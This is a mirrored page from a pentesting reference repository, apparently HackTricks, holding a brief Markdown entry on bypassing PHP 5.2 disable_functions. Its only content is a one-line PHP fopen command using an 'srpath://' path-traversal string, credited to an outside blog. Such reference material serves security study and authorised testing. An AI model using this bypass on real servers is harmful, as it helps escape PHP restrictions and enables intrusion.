mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-06 10:18:55 +00:00
11 lines
294 B
Markdown
11 lines
294 B
Markdown
|
# disable\_functions bypass - PHP 5.2 - FOpen Exploit
|
||
|
|
||
|
## PHP 5.2 - FOpen Exploit
|
||
|
|
||
|
From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
|
||
|
|
||
|
```php
|
||
|
php -r 'fopen("srpath://../../../../../../../dir/pliczek", "a");'
|
||
|
```
|
||
|
|